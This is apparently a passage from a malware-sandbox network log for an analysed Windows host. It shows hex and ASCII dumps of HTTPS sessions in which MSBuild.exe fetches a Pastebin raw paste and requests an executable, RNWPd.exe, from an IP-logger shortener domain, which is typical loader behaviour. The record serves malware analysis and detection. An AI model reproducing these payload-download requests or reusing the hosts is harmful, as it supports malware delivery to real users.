vaptzWLivT70JOWDfNhdOk3OIwveti5LpMGFwQMJzm+oDFJv6KimMZizdknUhl8lHDAyhMAZgWI1AZ2nhLhovCNYcvjICPaoWkRaakIV22s=$3/vo9ZeBZMr5cI4ZjTjr7g==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
2024-09-16 19:23:05 UTC	1369	IN	Data Raw: 34 30 64 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d Data Ascii: 40da<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
2024-09-16 19:23:05 UTC	1369	IN	Data Raw: 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 Data Ascii: MSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.theme-dark #challenge-error-text{background-image:url(data:image/svg
2024-09-16 19:23:05 UTC	1369	IN	Data Raw: 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d Data Ascii: Igdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuM
2024-09-16 19:23:05 UTC	1369	IN	Data Raw: 2e 33 39 31 70 78 7d 2e 66 65 65 64 62 61 63 6b 2d 63 6f 6e 74 65 6e 74 7b 61 6c 69 67 6e 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 67 72 69 64 3b 68 65 69 67 68 74 3a 31 30 30 76 68 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 2e 66 65 65 64 62 61 63 6b 2d 63 6f 6e 74 65 6e 74 20 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 30 7d 2e 68 65 61 64 69 6e 67 2d 66 61 76 69 63 6f 6e 7b 68 65 69 67 68 74 3a 32 72 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 72 65 6d 3b 77 69 64 74 68 3a 32 72 65 6d 7d 40 6d 65 64 69 61 20 28 77 69 64 74 68 20 3c 3d 20 37 32 30 70 78 29 7b 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 72 65 6d 7d 2e 68 Data Ascii: .391px}.feedback-content{align-content:space-between;display:inline-grid;height:100vh;margin:0;padding:0}.feedback-content .spacer{margin:0}.heading-favicon{height:2rem;margin-right:.5rem;width:2rem}@media (width <= 720px){.main-content{margin-top:4rem}.h
2024-09-16 19:23:05 UTC	1369	IN	Data Raw: 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 33 34 70 78 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 6f 6e 74 61 69 6e 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c Data Ascii: tLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+);padding-left:34px}#challenge-error-text,#challenge-success-text{background-repeat:no-repeat;background-size:contain}#challenge-success-text{background-image:url
2024-09-16 19:23:05 UTC	1369	IN	Data Raw: 6c 65 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 2e 35 72 65 6d 3b 77 69 64 74 68 3a 35 30 25 7d 2e 64 69 61 67 6e 6f 73 74 69 63 2d 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 7d 2e 66 6f 6f 74 65 72 20 2e 72 61 79 2d 69 64 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 66 6f 6f 74 65 72 20 2e 72 61 79 2d 69 64 20 63 6f 64 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 6d 6f 6e 61 63 6f 2c 63 6f 75 72 69 65 72 2c 6d 6f 6e 6f 73 70 61 63 65 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6f 76 65 72 66 6c 6f 77 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 7d 40 6d 65 64 69 61 20 28 Data Ascii: le}.clearfix .column{float:left;padding-right:1.5rem;width:50%}.diagnostic-wrapper{margin-bottom:.5rem}.footer .ray-id{text-align:center}.footer .ray-id code{font-family:monaco,courier,monospace}.core-msg,.zone-name-title{overflow-wrap:break-word}@media (
2024-09-16 19:23:05 UTC	1369	IN	Data Raw: 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 33 34 70 78 7d 2e 63 68 61 6c 6c 65 6e 67 65 2d 63 6f 6e 74 65 6e 74 20 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 63 68 61 6c 6c 65 6e 67 65 2d 63 6f 6e 74 65 6e 74 20 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 68 65 69 67 68 74 3a 37 36 2e 33 39 31 70 78 7d 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 32 32 3b 63 6f 6c 6f 72 3a 23 64 39 64 39 64 39 7d 62 6f 64 79 20 61 7b 63 Data Ascii: allenge-error-text{background-position:100%;padding-left:0;padding-right:34px}.challenge-content .spacer{margin:2rem 0}.challenge-content .loading-spinner{height:76.391px}@media (prefers-color-scheme:dark){body{background-color:#222;color:#d9d9d9}body a{c
2024-09-16 19:23:05 UTC	1369	IN	Data Raw: 53 34 77 4f 44 51 67 4d 53 34 30 4d 6a 64 78 4c 6a 59 32 49 44 41 67 4d 53 34 77 4e 54 63 75 4d 7a 67 34 4c 6a 51 77 4e 79 34 7a 4f 44 6b 75 4e 44 41 33 4c 6a 6b 35 4e 43 41 77 49 43 34 31 4f 54 59 74 4c 6a 51 77 4e 79 34 35 4f 44 51 74 4c 6a 4d 35 4e 79 34 7a 4f 53 30 78 4c 6a 41 31 4e 79 34 7a 4f 44 6b 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e Data Ascii: S4wODQgMS40MjdxLjY2IDAgMS4wNTcuMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+)}}</style><meta http-equiv="refresh" conten
2024-09-16 19:23:05 UTC	1369	IN	Data Raw: 56 68 49 45 36 78 75 6a 47 68 42 5a 68 55 50 64 49 6f 56 38 6b 51 61 66 76 6a 41 69 7a 4a 5f 4c 31 44 32 4c 67 42 4d 57 75 55 6b 37 6a 4c 58 55 44 73 4c 66 63 30 50 6d 72 55 6f 49 48 67 5a 62 4f 30 38 31 33 5f 56 54 53 63 4f 52 59 51 59 35 6f 44 71 45 4b 31 49 56 78 35 33 33 4e 33 6a 6b 64 64 42 78 48 46 34 44 75 4b 38 76 34 69 6a 74 68 64 78 6c 4f 5a 36 34 55 77 33 6e 76 6b 33 45 33 6c 59 6a 32 55 5f 77 7a 62 75 5f 33 79 4c 42 53 30 79 65 49 64 4a 48 55 43 6e 6c 5a 65 55 6d 57 68 62 55 59 59 36 58 78 5f 30 63 33 4a 6c 6d 43 32 4f 50 43 71 74 4e 31 31 33 6c 63 6a 77 57 37 74 33 44 66 46 6e 39 6e 4a 37 4d 6f 55 44 6c 49 69 53 67 57 53 47 44 38 57 45 78 50 53 70 6f 48 4a 38 39 76 45 55 67 6a 5f 6e 36 44 2e 53 44 52 68 47 5f 7a 4c 70 64 56 56 33 79 71 71 34 Data Ascii: VhIE6xujGhBZhUPdIoV8kQafvjAizJ_L1D2LgBMWuUk7jLXUDsLfc0PmrUoIHgZbO0813_VTScORYQY5oDqEK1IVx533N3jkddBxHF4DuK8v4ijthdxlOZ64Uw3nvk3E3lYj2U_wzbu_3yLBS0yeIdJHUCnlZeUmWhbUYY6Xx_0c3JlmC2OPCqtN113lcjwW7t3DfFn9nJ7MoUDlIiSgWSGD8WExPSpoHJ89vEUgj_n6D.SDRhG_zLpdVV3yqq4

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.6	49779	104.20.4.235	443	1340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-16 19:23:05 UTC	74	OUT	GET /raw/V6VJsrV3 HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-09-16 19:23:06 UTC	222	IN	HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 19:23:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Server: cloudflare CF-RAY: 8c433aa2de037292-EWR
2024-09-16 19:23:06 UTC	1147	IN	Data Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-09-16 19:23:06 UTC	1369	IN	Data Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72 Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
2024-09-16 19:23:06 UTC	1369	IN	Data Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
2024-09-16 19:23:06 UTC	529	IN	Data Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76 Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
2024-09-16 19:23:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.6	49780	188.114.97.3	443	1340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-16 19:23:06 UTC	65	OUT	GET /RNWPd.exe HTTP/1.1 Host: yip.su Connection: Keep-Alive
2024-09-16 19:23:06 UTC	902	IN	HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 19:23:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close memory: 0.36197662353515625 expires: Mon, 16 Sep 2024 19:23:06 +0000 strict-transport-security: max-age=604800 strict-transport-security: max-age=31536000 content-security-policy: img-src https: data:; upgrade-insecure-requests x-frame-options: SAMEORIGIN Cache-Control: max-age=14400 CF-Cache-Status: EXPIRED Last-Modified: Mon, 16 Sep 2024 19:23:06 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J4CINb68ngpw21o5djcizZ9p1sDyzq2OHSTWEPHRDdkzloBphXJmcLfakxDUfIP%2F7uJ%2F5gqBqirs%2BA97ze36d4MOXaDoF8Tu5PvDe3Ek6mv1I0Dzr%2ByCQk8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c433aa72bf743e9-EWR alt-svc: h3=":443"; ma=86400
2024-09-16 19:23:06 UTC	467	IN	Data Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
2024-09-16 19:23:06 UTC	1369	IN	Data Raw: 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 Data Ascii: after" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta prope
2024-09-16 19:23:06 UTC	1369	IN	Data Raw: 64 2d 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 Data Ascii: d-color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-dela
2024-09-16 19:23:06 UTC	1369	IN	Data Raw: 73 65 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d Data Ascii: serAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(nam
2024-09-16 19:23:06 UTC	1369	IN	Data Raw: 0a 3c 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 